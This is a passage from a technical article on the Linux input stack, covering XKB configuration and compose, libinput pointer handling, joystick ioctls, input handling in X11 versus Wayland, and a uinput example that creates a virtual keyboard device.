files are simply listing all the models, variants, layouts, and options
available, nothing more, and are used by the XKB registry library. That’s
in turn used by GUI selectors.
The logic exists within the rules files, that have this sort syntax:
! include %S/evdev
! option = symbols
custom:foo = +custom(bar)
custom:baz = +other(baz)
// One may use multiple MLVO components on the LHS
! layout option = symbols
be caps:digits_row = +capslock(digits_row)
fr caps:digits_row = +capslock(digits_row)
We won’t go into details, but basically it has lines starting with
!
that set certain MLVO values and then map them to KccgstValue specific
component values. There are also variable names that can be defined
as shorthand for multiple values with
$var = val1 val2
, and there
are string substitutions starting with
%
. More info can be found
here
.
So we’ve got the full scope now of RMLVO to KcCGST, the big picture!
We didn’t discuss another sub-feature of XKB called composing, or the
compose key processor. We didn’t mention it because the configuration
doesn’t come with the xkeyboard-config project. It’s loaded independently
by clients that want to perform composition.
For X11 the configuration is found under
/usr/share/X11/local/*/Compose
and
compose.dir
, and the home directory in
~/.XCompose
. The
content of this directory is mostly deprecated apart from the compose
definitions, which follows the
XKB_COMPOSE_FORMAT_TEXT_V1
format (see
Compose(5)
). It’s a simple format that looks like this:
As you can see, this is the
<Multi_key>
keysym we’ve talked about in
an earlier example, this is where it’s interpreted.
After editing any of the files, the syntax can be validated with
xkbcli
compile-compose
.
The way the file is used is that clients will pass it to the XKB compose
parser to get an in-memory table of it. Then the client keeps the compose
state, just like the modifier state, and plug it in the main interaction
with XKB we’ve seen earlier. Like this:
// 1. Load compose table (locale-dependent)structxkb_compose_table*table=xkb_compose_table_new_from_locale(ctx,getenv("LANG"),XKB_COMPOSE_COMPILE_NO_FLAGS);// 2. Create a compose statestructxkb_compose_state*compose=xkb_compose_state_new(table,XKB_COMPOSE_STATE_NO_FLAGS);// 3. For each key press:xkb_keysym_tsym=xkb_state_key_get_one_sym(state,keycode);xkb_compose_feed_resultres=xkb_compose_state_feed(compose,sym);// Feed all keysyms into the compose engine:xkb_compose_state_feed(compose_state,sym);// 4. Check compose statusswitch(xkb_compose_state_get_status(compose_state)){caseXKB_COMPOSE_COMPOSED:composed_sym=xkb_compose_state_get_one_sym(compose_state);// Use composed_sym; DO NOT use 'sym'// char buf[64];// xkb_compose_state_get_utf8(compose_state, buf, sizeof(buf));// printf("→ composed result: %s\n", buf);break;caseXKB_COMPOSE_CANCELLED:// Typically fall back to original symbreak;caseXKB_COMPOSE_COMPOSING:// Wait for next keybreak;caseXKB_COMPOSE_NOTHING:// No composition; use raw 'sym'break;}// otherwise// xkb_state_key_get_utf8
So, to make key composing work, it’s all dependent on the client, be
it in X11 or Wayland. In general widget/toolkit libraries, and Xlib,
does it out-of-the-box and/or easily for us.
Finally, let’s review how to interface with XKB from the command line.
There are a couple of X11 bound, and deprecated legacy, commands such as:
xmodmap
(pre-XKB even)
setxkbmap
xkbcomp
xev
xkbprint
xkbevd
They will not work on Wayland since they rely on the XKB X11 specific
proto (XKM binary format and others), but are still good to debug certain
behavior on X11, and to directly interface with X11 to configure XKB
interpretation on the fly, since obviously it’s these software that rely
on the library and load the appropriate configurations.
The main interaction these days should all pass through
xkbcli
and
its subcommands. It comes with a few handy man pages:
xkbcli
xkbcli-list
xkbcli-dump-keymap-x11
xkbcli-dump-keymap-wayland
xkbcli-interactive-x11
xkbcli-interactive-wayland
xkbcli-compile-compose
xkbcli-how-to-type
xkbcli-compile-keymap
xkbcli-interactive-evdev
> xkbcli how-to-type 'P'
keysym: P (0x0050)
KEYCODE KEY NAME LAYOUT LAYOUT NAME LEVEL# MODIFIERS
33 AD10 1 English (US) 2 [ Shift ]
33 AD10 1 English (US) 2 [ Lock ]
> xkbcli compile-keymap --kccgst--layout us --options terminate:ctrl_alt_bksp
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us+inet(evdev)+terminate(ctrl_alt_bksp)"};
xkb_geometry { include "pc(pc105)"};};
To list the whole RMLVO possible values from the registry:
Another thing that is interesting to know is that the XKB
keymap can be converted to Console keymap with scripts such as the
setupcon(1)
which relies on
ckbcomp
and others, and will read confs from
/etc/default/keyboard
.
Obviously, let’s not forget to mention
localectl(1)
to interface with
systemd-localed.service(8)
that is the newer version of
setupcon(1)
. It’s sort of a big wrapper over other tools and behavior
to automate things.
> localectl
System Locale: LANG=en_US.UTF-8
VC Keymap: us
X11 Layout: us
We’ll see how it sets it in X11, but let’s just say it can be used to
list keymaps:
There are also the options
list-x11-keymap-models
,
list-x11-keymap-layouts
,
list-x11-keymap-variants [LAYOUT]
,
list-x11-keymap-options
.
And to set it with
set-x11-keymap
. However it always tries to convert
the XKB keymap to console keymap whenever it can, if you don’t want that
behavior, you should add this option:
> localectl set-x11-keymap --no-convert keymap
Let’s end on a funny note to wrap things up about XKB. Yubikeys work by
simulating keyboards, and thus they have to anticipate a very specific
layout and variant, otherwise inserting a Yubikey would output the
wrong values. To skip this, there are udev device properties (
ENV{}
set from hwdb) called
XKB_FIXED_LAYOUT
and
XKB_FIXED_VARIANT
that
need to be set and respected by the clients of libxkbcommon.
From
60-keyboard.hwdb
:
# Yubico Yubico Yubikey II
evdev:input:b0003v1050p0010*
# Yubico Yubikey NEO OTP+CCID
evdev:input:b0003v1050p0111*
# Yubico Yubikey NEO OTP+U2F+CCID
evdev:input:b0003v1050p0116*
# OKE Electron Company USB barcode reader
evdev:input:b0003v05FEp1010*
XKB_FIXED_LAYOUT=us
XKB_FIXED_VARIANT=
Here’s a summary of what was discussed in the XKB stack:
Pointer Specifics
We’ve seen a lot of complex keyboard specific input behavior, let’s
dabble a bit with pointer devices now, from mice to touchpads.
Types of Touchpads
Let’s mention a few definitions.
In general we call a pointer the representation of the input device,
and the cursor the drawn icon representation.
We have clickpads, a touchpad that has no separate buttons, but
that is all clickable. The behavior then depends on where the click
happens. Meanwhile, forcepads are like clickpads but they don’t have
any buttons and instead will vibrate when pressed. Lastly, trackpoints
are the little balls/nudge in the middle of the keyboard of Thinkpads,
they’re tagged in udev/hwdb with
ID_INPUT_POINTINGSTICK
property.
Device: TPPS/2 Elan TrackPoint
trackpoint: the nudge of thinkpads
# Name: TPPS/2 Elan TrackPoint# ID: bus 0x0011 vendor 0x0002 product 0x000a version 0x0063# Supported Events:# Event type 0 (EV_SYN)# Event type 1 (EV_KEY)# Event code 272 (BTN_LEFT)# Event code 273 (BTN_RIGHT)# Event code 274 (BTN_MIDDLE)# Event type 2 (EV_REL)# Event code 0 (REL_X)# Event code 1 (REL_Y)# Properties:# Property 0 (INPUT_PROP_POINTER)# Property 5 (INPUT_PROP_POINTING_STICK)
properties:
- ID_INPUT=1
- ID_INPUT_MOUSE=1
- ID_INPUT_POINTINGSTICK=1
driver:psmouse
As you can see from the above, the trackpoint also has attached to it
some physical buttons, they’re the ones above the Thinkpad touchpad. It’s
in between a mouse and a touchpad.
There are internal touchpads and external touchpads. The external
touchpads don’t get turned off when the lid is closed, nor disabled
while typing. A graphic tablet such as a wacom device is effectively an
external touchpad.
This information can be embedded in a udev device property called
ENV{ID_INPUT_TOUCHPAD_INTEGRATION}
, and set to either “external” or
“internal”. This is part of the hwdb, out-of-the-box:
Last interesting fact is that some touchpad can have capacitive touch,
that means they can detect the finger in a range above the touchpad,
hovering in proximity. This is the
BTN_TOOL_FINGER
in contrast to
BTN_TOUCH
, but they often come together and so you have to discern if
it’s a real touchdown or not. For MT there’s also
ABS_MT_PRESSURE
and
ABS_MT_DISTANCE
that can be used for this. That’s another job that
libinput is good at.
MT — MultiTouch
We quickly went over the concept of MT, or multitouch before, let’s add
a bit more info to that.
Multitouch are touchpads that support tracking more than one finger. They
speak evdev multitouch to user-space (type B), and most often are handled
by the hid-multitouch driver from the kernel side.
The capabilities of an MT touchpad should have something similar to this
(
libinput record
output or others):
key: BTN_LEFT, BTN_TOOL_FINGER, BTN_TOOL_DOUBLETAP, BTN_TOUCH
(BTN_TOOL_DOUBLETAP up to BTN_TOOL_QUINTTAP)
abs: ABS_X, ABS_Y, ABS_MT_SLOT, ABS_MT_POSITION_X, ABS_MT_POSITION_Y,
ABS_MT_TOOL_TYPE, ABS_MT_TRACKING_ID
There can also be
ABS_MT_TOUCH_MAJOR
,
ABS_MT_TOUCH_MINOR
,
ABS_MT_WIDTH_MINOR
, and
ABS_MT_WIDTH_MAJOR
, that are used to provide
the size of the contact area in surface or absolute units. There’s
also
ABS_MT_ORIENTATION
, for the orientation of the touching ellipse
(finger).
For MT, the key events are simple, they tell us how many fingers are
tapping.
Then, fingers are tracked in what’s called “slots” along with a new
unique tracking id each time a finger touchdown again, and like all
evdev it’s a stateful protocol.
So for example, slot 0 gets assigned tracking id 1 when the first finger
is down, then slot 1 gets assigned tracking id 2 when the second finger
is down, then the first finger is lifted and put back down again, and
slot 0 gets assigned tracking id 3.
That can sound complex to track, and again that’s where libinput
shines. Here’s what it looks like in a simplified evdev trace:
Once upon a time everyone was bragging about their synaptics touchpad
confs, yet this is now deprecated in favor of libinput. What was that
all about?
Synaptics, unrelated to synaptics inc, was a complex X11 driver with
so many configurations. It was buggy and had lots of internal magic,
especially its acceleration profiles, which had logic split between the
X11 server and the driver.
Synaptics was configured through the command line
synclient
. They
talked through a special interfaced with a custom protocol (shared memory
segment). That is before X11 had any standard way to dynamically be
configured (with
xinput
), and before evdev was a thing. This was hacky.
These days X11 and Wayland rely on libinput so this should be used
instead.
The only feature missing from libinput, which is implemented in user-space
by the widget libraries and DE, is non-linear acceleration and speed,
kinetic scrolling. That’s mostly a non-issue.
Acceleration Profile
Simply said, pointer acceleration is the function that multiplies the
movement deltas with a given factor:
One of the main role of libinput is to make pointer movement as precise
as possible on all devices. If the user intends and performs action,
the feedback should be that it’s what they expected to do.
An acceleration profile defines a series of points of the form
(x, f(x))
,
input to output speed, that are linearly interpolated (a curve is drawn
between them for deduction). For example, flat acceleration is
[(0.0, 0.0), (1.0, 1.0)]
.
The default acceleration, adaptive, is pretty smart, and differs per
device type and resolution, it already has these configured for touchpads
for example:
super-slow: deceleration
slow: deceleration
medium: adaptive+deceleration
fast: adaptive+fast
flick: fast
In general, libinput allows to configure this behavior. We can pick
between 3 pointer acceleration profiles: adaptive (default), flat the
45° one we’ve seen, and custom profiles. Along with different types
of motions the profiles can apply to: motion, scroll, fallback. We can
configure points and steps for each one: the points are the x and y
creating the curve of the acceleration profile we talked about, and the
steps is how the interpolation granularity happens between the points
(a value of 0 will use the default).
In most cases, not touching the acceleration profile provides better
results.
In
libinput list-devices
for a touchpad:
Accel profiles: flat *adaptive custom
Gestures
We’ve seen that libinput offers two types of gestures out-of-the-box:
swiping and pinching. For anything else, one has to rely on third party
libraries. Here are a few:
Let’s close this section with a few random details that don’t need
much discussion.
High-end gaming mice are finicky and often normal basic drivers are not
enough to configure their high precision, nor is libinput. That’s why the
libratbag
project exists.
The libwacom (not only wacom) and tools such as Tuhi are used to manage
information needed by libinput to handle drawing tablets. These tablets
come with a tool such as a pen/stylus, it’s specificities are handled too.
For example, pressing certain button to reverse the behavior and start
erasing. There are X11 tools such as
xsetwacom
that also help.
An interesting software is
gpm(8)
which is a mouse in
the console that relies on reading directly the mouse stream
character device and interfacing/translating them to
TIOCLINUX
TIOCL_SELMOUSEREPORT
, terminal ioctl, to draw it. The terminal
will then output specific mouse reporting escape codes (more info
here
).
Finally, here’s a few pointer specific debug tools:
Gamepads aren’t handled by libinput in user-space, nor do they rely on
the evdev handler in the kernel. Instead they rely on the joydev handler.
The gamepads get associated to their specific drivers, which
will consume all these events. The joydev handler then normalizes
and sends them to user-space in a format called
js_event
from
include/uapi/linux/joystick.h
.
The handler will listen to all devices that support
EV_KEY
BTN_JOYSTICK
or
BTN_GAMEPAD
and similar events, and create a stream
device in devtmpfs for it
/dev/input/jsN
.
The handler character device supports a bunch of standard ioctl calls
to get/set info:
JSIOCGVERSION
: get driver version
JSIOCGAXES
: get number of axes
JSIOCGBUTTONS
: get number of buttons
JSIOCGNAME(len)
: get identifier string
JSIOCSCORR
: set correction values
JSIOCGCORR
: get correction values
JSIOCSAXMAP
: set axis mapping
JSIOCGAXMAP
: get axis mapping
JSIOCSBTNMAP
: set button mapping
JSIOCGBTNMAP
: get button mapping
Obviously, it’s better to do this via tools such as:
jstest
and
jstest-gtk
jscal
joyful
Upper Stack: X11 & Wayland
We’ve reached the graphical environment with desktop widget libraries such
as GNOME and Qt, and the XServer and Wayland Compositors. They’re
the ones that rely on all types of input events for concrete behavior,
from clicking buttons on the appropriate window, drawing a cursor
on screen, scrolling, and literally all interactions a user has with
a computer.
This upper stack relies on libinput and XKB to make everything happen. As
far as these two are concerned, the role of the upper stack is to
initialize them with the right configurations, and then create the
handling for whatever they’re meant to do.
The big difference between the X11 stack and Wayland stack is related to
the protocol and where these libraries are included. There are no window
managers in Wayland, but compositors that fully implement the standard
protocol of both a display server and window manager at the same time. So
it’s not a two-process equation, the compositor is the one handling
libinput and implementing the desktop interface. Meanwhile, in X11, the
Xserver, which is quite old, has the abstract concept of input drivers,
of which the currently only useful one is
xf86-input-libinput
. The
X11 input are interfaced with through the X11 protocol with XInput
events shared to the WM and other clients so that they can use them,
and configure the server’s input devices. Similarly, in X11 all the
configurations happen over the X protocol and its extensions, meanwhile
for compositors there’s no agreed way to configure things, so each
compositor can implement their own thing.
Here’s a general picture of the stack (
courtesy of
who-t, Peter Hutterer
):
Obviously, each have their own internal representation and ways of managing
the information they get from libinput, XKB, and others, but this is
outside the scope of this article (
wl_pointer
and
wl_keyboard
on
Wayland for example). Let’s focus more on how they configure the input
stack we’ve seen.
The X server has an internal store of information about input devices,
and their drivers, and will apply the default settings for each. To
apply specific configurations for certain devices, we can add snippets
in the X11 config directory, usually
/usr/share/X11/xorg.conf.d/
.
The
libinput(4)
driver settings can be passed there for a matching
device.
The “Identifier” is just a human-readable string for logging, meanwhile
the series of “Match” statements can be found in
xorg.conf(5)
, there’s
quite a few of them and they remind us of udev rules. The “Option”
part is what interests us, these are the settings to pass to libinput
and that can be found in
libinput(4)
. For example:
On the X11 stack, the server will initially set these values to override
the default ones, but afterward, during runtime, any caller can rely on
the X protocol to update them. The
xinput(1)
command can be used to
debug and test setting X input devices.
To list input devices that the X server is aware of:
> xinput list
⎡ Virtual core pointer id=2 [master pointer (3)]
⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)]
⎜ ↳ ETPS/2 Elantech Touchpad id=15 [slave pointer (2)]
⎜ ↳ SEMICO USB Keyboard Consumer Control id=10 [slave pointer (2)]
⎣ Virtual core keyboard id=3 [master keyboard (2)]
↳ Virtual core XTEST keyboard id=5 [slave keyboard (3)]
↳ Power Button id=6 [slave keyboard (3)]
↳ Video Bus id=7 [slave keyboard (3)]
↳ Power Button id=8 [slave keyboard (3)]
↳ Sleep Button id=9 [slave keyboard (3)]
↳ AT Translated Set 2 keyboard id=14 [slave keyboard (3)]
↳ Acer WMI hotkeys id=16 [slave keyboard (3)]
↳ GeneralPlus USB Audio Device id=17 [slave keyboard (3)]
↳ SEMICO USB Keyboard Consumer Control id=11 [slave keyboard (3)]
↳ SEMICO USB Keyboard System Control id=12 [slave keyboard (3)]
↳ SEMICO USB Keyboard id=13 [slave keyboard (3)]
NB
: Keep in mind the XTEST virtual devices, which only exist within
X11 internally and don’t appear in
libinput list-devices
, we’ll get
back to these in the next section.
Or list the properties of a particular device entry:
What happens here is that the client (
xinput
) talks to the X server
over the X protocol, then the X server talks to its libinput driver
xf86-input-libinput
which in turn talks to libinput and updates its
configurations, and the X server keeps track of all this.
These all look somewhat redundant, as you can see, it’s like having an
intermediate layer. That’s why on Wayland there’s no intermediary, if
a client tells it, through whatever configuration means it exposes, to
set certain settings on an input device, it does it directly via libinput.
Yet, the list of input devices is internal to Wayland, and not exposed
directly in the protocol, that’s why it differs in each compositor
implementation.
For instance, if we’re toggling a setting in GNOME, KDE, MATE, or others,
the behavior will be more direct. In GNOME, things happen through
gsettings
:
So that’s how you’d configure input devices on GNOME Wayland compositor
Mutter. Yet that’s annoying, isn’t there a common way to do this on
Wayland?
There are workarounds such as
libinput-config
but it’s not
very well maintained.
So, clients in graphical environments need to get input events to
them. On X11 these are called X events, and they can be spied on with the
xev(1)
tool, which can help debug issues. It shows events sent to the
particular window chosen.
In theory on X11 one could catch all events on the “root window” is
subscribed to (
xev -root
does that) or of any other window. Events
conceptually travel down the window hierarchy, and clients only
receive the events for which they have selected an appropriate event
mask. However, the root window always sits at the top of this hierarchy
and can optionally subscribe to essentially all events before they
propagate to child windows, while grabs and higher-priority selections
(such as by the window manager) can intercept or redirect them. That’s
how WMs work, they’re the parent window and have an “event mask” to
catch certain events and input for itself, and is exclusively allowed
to do redirect of certain events such as mapping/moving/configuring
windows.
Meanwhile, a sort of equivalent, but more simple, tool on Wayland is
called
wev
, we’ll do the comparison
in a bit to help us understand the differences. Here’s a trace of
xev
> xev -event keyboard
KeyRelease event, serial 28, synthetic NO, window 0x2e00001,
root 0x3fa, subw 0x0, time 465318306, (81,81), root:(893,376),
state 0x10, keycode 108 (keysym 0xff20, Multi_key), same_screen YES,
XLookupString gives 0 bytes:
XFilterEvent returns: False
…
KeyRelease event, serial 28, synthetic NO, window 0x2e00001,
root 0x3fa, subw 0x0, time 465318602, (81,81), root:(893,376),
state 0x10, keycode 48 (keysym 0x27, apostrophe), same_screen YES,
XLookupString gives 1 bytes: (27)"'"
XFilterEvent returns: False
KeyPress event, serial 28, synthetic NO, window 0x2e00001,
root 0x3fa, subw 0x0, time 465318866, (81,81), root:(893,376),
state 0x10, keycode 26 (keysym 0x65, e), same_screen YES,
XLookupString gives 1 bytes: (65)"e"
XmbLookupString gives 1 bytes: (65)"e"
XFilterEvent returns: True
KeyPress event, serial 28, synthetic NO, window 0x2e00001,
root 0x3fa, subw 0x0, time 465318866, (81,81), root:(893,376),
state 0x10, keycode 0 (keysym 0xe9, eacute), same_screen YES,
XLookupString gives 0 bytes:
XmbLookupString gives 2 bytes: (c3 a9)"é"
XFilterEvent returns: False
As you can observe here, The Xlib client does a lookup for keycode to
keysym translation by relying on functions such as
XLookupString
and
XmbLookupString
. These particular functions use a keymap logic that
dates back to pre-XKB time, we’ll talk more about them in a bit. Yet,
internally now, the X server does rely on XKB in the backend, just like
for input device info, it keeps a keymap table internally, and it’s
shared over the X protocol with clients (they ask for it at connection,
or lazily when calling functions, and cache it) so that they perform
the translation with Xlib or XCB.
There are two main formats for the shared X server keymap the clients
can rely on: the old “X core keymap”, and an XKB keymap. We’ll discuss
that old core keymap in a bit.
In XCB, the old keymap translation is done via:
xcb_key_symbols_get_keycode
xcb_key_symbols_get_keysym
And in Xlib with functions such as:
XLookupString
Xutf8LookupString
XLookupKeysym
XkbTranslateKeyCode
XkbTranslateKeySym
XStringToKeysym
XKeysymToKeycode
Meanwhile, with the newer XKB keymap it’s done via:
XkbTranslateKeyCode
Or in XCB with the
xcb_xkb_*
functions (you have to do it manually).
In all cases, since XKB is the tech in the backend of the X server
that stores the keymap truth, it’s what needs to be configured. The XKB
configuration can be set statically, along with the usual input confs
we’ve seen earlier, with the Xkb options:
There are also two special options that get interpreted when certain
special keysym are generated, the
DontVTSwitch
which is there to disable
the
ctrl+alt+fn
sequence to switch virtual terminal, and the
DontZap
which catches the
Terminate_Server
keysym of XKB and will kill the Xorg
server. Both are enabled by default and these options would turn them off.
To change the XKB options on a running X server on-the-fly, we need to
rely on two tools:
xkbcomp(1)
and
setxkbmap(1)
. The first one is
used to compile new KcCGST and upload it to the server as a full keymap
in XKM compiled format that the server understands, and the second one
to change the current value of the RMLVO.
> setxkbmap -print-verbose 10
Setting verbose level to 10
locale is C
Trying to load rules file ./rules/evdev...
Trying to load rules file /usr/share/X11/xkb/rules/evdev...
Success.
Applied rules from evdev:
rules: evdev
model: pc105
layout: us
options: compose:ralt
Trying to build keymap using the following components:
keycodes: evdev+aliases(qwerty)
types: complete
compat: complete
symbols: pc+us+inet(evdev)+compose(ralt)
geometry: pc(pc105)
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us+inet(evdev)+compose(ralt)"};
xkb_geometry { include "pc(pc105)"};};
Now let’s talk about that pre-XKB logic with functions such as
XLookupKeysym(3)
we’ve seen in the
xev
trace earlier. It’s currently
basically a wrapper over XKB, but that can also bypass it entirely. It
relies on the old “X core keymap table” in the X server, a facade on
the authoritative keymap that is XKB backed. The client asks for it
via a request, cache it, and use it for the mapping of X11 keycode
to X11 keysym. It’s own X11 keycodes are implementation dependent,
but nowadays it’s mostly
evdev + 8
, and its keysyms are found in
/usr/include/X11/keysymdef.h
, which the newer XKB stack also relies
on in X11. So that old keymap is indeed initially filled with the XKB
keymap. The tool
xmodmap(1)
will help us explore and show some of the
things it handles.
Yes,
xmodmap
has its own configuration in
~/.Xmodmap
and expression
grammar that looks something like a simplified version of XKB:
! remove Caps Lock functionality
remove Lock = Caps_Lock
! make CapsLock (keycode 66) act as Tab
keycode 66 = Tab
! set Menu key (keycode 134) properly
keycode 134 = Menu
! Set Right Alt as Compose (Multi_key)
! Use keysym form so you don't need to know the numeric keycode:
keycode 108 = Multi_key
! ensure Right Alt is not still treated as an Alt modifier
remove Mod1 = Alt_R
There’s even the
xkeycaps
GUI around it, and wrappers like
xcape
.
Yet, GNOME and certain other toolkits and desktop environments
have stopped relying on the old core keymap a long time ago,
deprecating it in favor of the XKB related functions. Still, the
X server will internally reflect these changes in its XKB cache,
making them internally compatible, notifying X clients of teh
change, and it’ll work but temporarily
(mainly with
XChangeKeyboardMapping
which calls
XkbApplyMappingChange
in the X Server). It’s fragile and legacy. Also, changing the keymap with
xmodmap
is flimsy since any time the XKB keymap is reloading the changes
to the old in-memory X keymap compatibility is lost. Those combined
together means that it isn’t reliable to use the old X11 core keymap.
As you can see yet again, this is quite confusing and redundant, and
obviously Wayland doesn’t have these old layers of indirection and
relies on XKB directly. It also doesn’t need a compiled forms like XKM
to upload keymaps to the server, but it doesn’t even include that upload
part in the protocol anyhow. The keycode to keysym translation is also
done in the client (with calls such as
xkb_state_key_get_one_sym
)
but the keymap is directly shared along the
wl_keyboard
object that
it gets accessed to when it wants input access on the seat, so there’s
no need for another round-trip.
Yet, again the configuration of XKB-related stuff on Wayland depends on
the compositor implementation.
For example
wlroots
relies on environment variables to set the RMLVO.
GNOME on
gsettings
with
gsettings set org.gnome.desktop.input-sources sources "[('xkb', 'us'), ('xkb', 'fr')]"
Let’s go back to the
wev
tool,
which displays input events on Wayland, it’ll help us understand a
huge difference in input handling on Wayland compared to X11. Unlike X
severs, a Wayland compositor doesn’t propagate and broadcast the events
globally to anyone listening. Instead, clients must explicitly register
a listener for the objects they care about. These are announced via the
global Wayland registry, which it has to register to (
wl_registry
).
Afterward, a client has to bind and listen to the given seat (
wl_seat
)
of the given name by the registry (this is where the
ENV{ID_SEAT}
and
loginctl
can help since they often map 1-to-1), and advertise the set of
“seat capabilities” it requires and wants to bind to, such as pointer,
keyboard, or touch. Once bound, the client can now fetch a handle to the
wl_<pointer/keyboard/touch>
objects, and register listener handlers
for their events. Let’s note that a
wl_keyboard
is an abstraction
of all logical keyboard events. So clients aren’t aware of underlying
devices, it’s abstracted and aggregated in the compositor internally,
by its own logic. Plus, for extra security,
wl_<pointer/keyboard/touch>
events are only forwarded to the currently focused client. All and all,
it’s very choreographed, unlike in X11.
Beyond the core protocol, there are more “unstable”
or “non-standard” extensions that allow clients to do
more things related to input. Here’s a non-exhaustive
list
:
Repositioning the pointer (
wp_pointer_warp_v1
)
Subscribing to high-def keyboard timestamps (
zwp_input_timestamps_manager_v1
)
Ignoring keyboard shortcuts from a client (
zwp_keyboard_shortcuts_inhibit_manager_v1
)
Adding constraints to pointer motion (
zwp_pointer_constraints_v1
)
Register to handle gestures, swipe, pinch, and hold (
zwp_pointer_gestures_v1
)
Specific XWayland grabbing of input, monopolizing it (
zwp_xwayland_keyboard_grab_manager_v1
)
Grab hotkeys, usually not needed since the compositor do this (
hyprland_global_shortcuts_manager_v1
)
Grab/Inhibit an input to a single surface such as lock screen (
zwlr_input_inhibit_manager_v1
,
hyprland_focus_grab_manager_v1
)
Notice too that nowhere in the protocol is there any interface
to list the compositor’s internal input devices in its registry,
it’s intentionally abstracted away. It’s up to each compositor
to choose if it wants to expose this info. To my knowledge,
there’s only Sway that offers an interface for this through
swaymsg
, it’s kind of
similar to
gsettings
.
The closest compositor-agnostic tools are external utilities such
as
libinput list-devices
or
loginctl seat-status
. However, these
enumerate kernel devices, not the compositor’s internal virtual devices,
so you will not see compositor-created synthetic devices there.
In short, which compositor implements which part of the “non-standard”
protocol varies a lot. GNOME uses almost none of the wlroots/WLR
extensions. KDE uses KDE-specific extensions. wlroots-based
compositors share WLR extensions. It’s a mix really, check
this
for support and more info.
We mentioned before
localectl
too for setting keyboard keymap
setups that works across environments. Let’s add that when using
the
set-x11-keymap
option it will modify X11 configurations in
/etc/X11/xorg.conf.d/00-keyboard.conf
and pre-fill them for you so
you won’t have to worry about editing anything with the options we’ve
listed. It doesn’t have this option for Wayland though.
Yet, what if someone on Wayland wants to remap just a specific
key without passing by the static XKB and its mess, just a
quick runtime change. There’s no real solution to that other
than what we’ve already mentioned in the scancode to keycode
section, namely tools that rely on evdev interception to remap events
such as
evmapd
,
evremap
,
evdevremapkeys
,
evsieve
,
keyd
,
kbct
,
makima
,
input-remapper
,
etc.. A true panoply of tools that are hacks. Most, if not all, of
these work by intercepting evdev events, creating a new virtual device
(we’ll see how
uinput
works in the next section), and modifying the
events on-the-fly to write them to the virtual device. This adds a new
unnecessary layer of indirection, which you should obviously avoid if
you are doing anything speed sensitive with the keyboard. Furthermore,
some of these re-include the key composition and a semblance of XKB
logic within them, which creates a total mess.
Let’s continue…
Contrary to everything else in the GUI stack, XKB composition is a
bit less cumbersome. Both Wayland clients, through their toolkits
(GTK, Qt, etc..) and X11, through Xlib with the functions we’ve seen
earlier that do it out-of-the-box (
XLookupString
), rely on the
same configuration files we’ve discussed in the XKB section. Namely,
/usr/share/X11/locale/<locale>/Compose
and the home
~/.XCompose
. It
follows the simple format described in
Compose(5)
.
And lastly, one thing that isn’t handled neither in libinput nor XKB is
key repeat: how long when pressing a key will the client wait to print
it again.
In X11 this is configured in the X Server, either as a startup option
-ardelay
and
-arinterval
, or dynamically via
xset(1)
. There’s the
option to set the delay and interval for a specific key too.
> xset r rate delay [rate]
> xset r rate 210 50
If you inspect
xev
you’ll see that the server resends keys to the
client continuously.
Meanwhile, as with everything else on Wayland, it depends on the
compositor. The compositor sends to the clients the repeat parameters
wl_keyboard.repeat_info(rate, delay)
and it’s up to them to respect
it. So, the compositor doesn’t keep forwarding the key to the client but
instead this is handled directly in the client.
And similarly, these are configured in
gsettings
and other
compositor-specific configurations.
The repeat key rate and delay being delegated to
clients on Wayland has had its share of issues it created though
(
see
)
and some people want to have it
back in the
compositor
.
That’s it, we’ve covered most of the things we wanted in the upper
graphical stack.
Virtual Input, Automation, Emulation, and Remote Desktop
We’ve grazed the topic of virtual inputs before, in this section we’ll
see what types exist and where they’re used, from automation, emulation,
and remote desktop.
The first layer where we can create virtual input devices is at the
kernel layer. It provides two modules that can be used for this:
UHID
, User-space I/O driver support for HID subsystem, and uinput,
the User-space input emulation module.
The
uhid module
,
as the name implies, allows simulating HID events from user-space
by reading/writing to a special character device in devtmpfs
/dev/uhid
. The interface is quite simple as is shown in
this
example
.
However, this is only used for emulating devices and debugging, not for
the average user’s virtual input. This is the underlying mechanism behind
hid-record
and
hid-replay
, which can easily allow debugging hid
issues by reproducing the exact sequences of events on anyone’s machine.
While uhid acts in the HID layer, the uinput module
(
drivers/input/misc/uinput.c
) acts at the input core layer, which
makes it more approachable for basic input event virtualisation.
It is also a character device in devtmpfs
/dev/uinput
that exposes
particular ioctl to create, manage, and configure capabilities of a
virtual device, and then allow writing to
/dev/uinput
file descriptor
to simulate the events of said device. The device will appear, like any
other input device, in devtmpfs and sysfs, since it’ll pass by the same
pipeline with
struct input_dev
and the default evdev event handler.
There are two main ways to use uinput in the code, via
<linux/uinput.h>
or via
<libevdev/libevdev-uinput.h>
. The libevdev mechanism is simpler
and recommended.
Example 1:
#include<unistd.h>
#include<linux/uinput.h>
#include<fcntl.h>
#include<string.h>
#include<stdio.h>
#include<errno.h>
#include<linux/uinput.h>voidemit(intfd,inttype,intcode,intval){structinput_eventie;ie.type=type;ie.code=code;ie.value=val;/* timestamp values below are ignored */ie.time.tv_sec=0;ie.time.tv_usec=0;write(fd,&ie,sizeof(ie));}intmain(void){structuinput_setupusetup;intfd=open("/dev/uinput",O_WRONLY|O_NONBLOCK);/*
* The ioctls below will enable the device that is about to be
* created, to pass key events, in this case the space key.
*/ioctl(fd,UI_SET_EVBIT,EV_KEY);ioctl(fd,UI_SET_KEYBIT,KEY_SPACE);memset(&usetup,0,sizeof(usetup));usetup.id.bustype=BUS_USB;usetup.id.vendor=0x1234;/* sample vendor */usetup.id.product=0x5678;/* sample product */strcpy(usetup.name,"Example device");ioctl(fd,UI_DEV_SETUP,&usetup);ioctl(fd,UI_DEV_CREATE);/*
* On UI_DEV_CREATE the kernel will create the device node for this
* device. We are inserting a pause here so that user-space has time
* to detect, initialize the new device, and can start listening to
* the event, otherwise it will not notice the event we are about
* to send. This pause is only needed in our example code!
*/sleep(60);/* Key press, report the event, send key release, and report again */emit(fd,EV_KEY,KEY_SPACE,1);emit(fd,EV_SYN,SYN_REPORT,0);emit(fd,EV_KEY,KEY_SPACE,0);emit(fd,EV_SYN,SYN_REPORT,0);/*
* Give user-space some time to read the events before we destroy the
* device with UI_DEV_DESTROY.
*/sleep(100);ioctl(fd,UI_DEV_DESTROY);close(fd);return0;}
Compile with
gcc -o uinput_test uinput_test.c -Wall -Wextra
And example 2 with libevdev:
